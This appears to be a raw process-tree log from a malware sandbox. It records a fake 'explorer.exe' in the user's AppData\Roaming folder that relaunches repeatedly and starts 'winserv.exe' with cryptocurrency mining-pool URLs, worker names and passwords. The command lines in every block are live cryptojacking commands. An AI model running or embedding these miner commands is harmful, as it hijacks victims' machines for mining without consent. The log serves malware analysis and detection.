C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4044
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3680
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1452
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5112
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:436
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1588
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:116
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4100
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2988
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4444
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2176
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2136
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1088
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:748
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3748
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3052
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5008
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1020
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2216
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2404
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4588
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4976
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2412
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3360
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3536
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2348
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4508
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3300
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:968
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:920
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3624
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5068
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3052
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2700
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2748
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3732
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3380
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3780
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2312
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3428
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1764
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2952
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4968
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4704
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1232
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1588
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2132
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4572
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4448
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1640
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:540
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3384
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4584
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4148
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1432
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4652
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3732
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3780
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1872
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2168
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1764
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3256
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:116
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4260
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:968
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3828
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3476
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4348
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4448
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4400
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4880
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2096
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:440
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2576
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2860
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4304
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5112
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4844
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4004
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2928
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5004
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3540
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4624
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3568
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4112
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1720
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4088
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2348
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2132
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4356
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2792
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4848
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1640
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4960
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3464
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3384
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3328
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3988
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4152
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2268
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1204
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:64
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2604
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1232
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1408
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4572
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4428
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2900
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2136
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5092
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2960
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2884
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2312
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1016
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4008
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3536
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3624
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3152
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4624
-
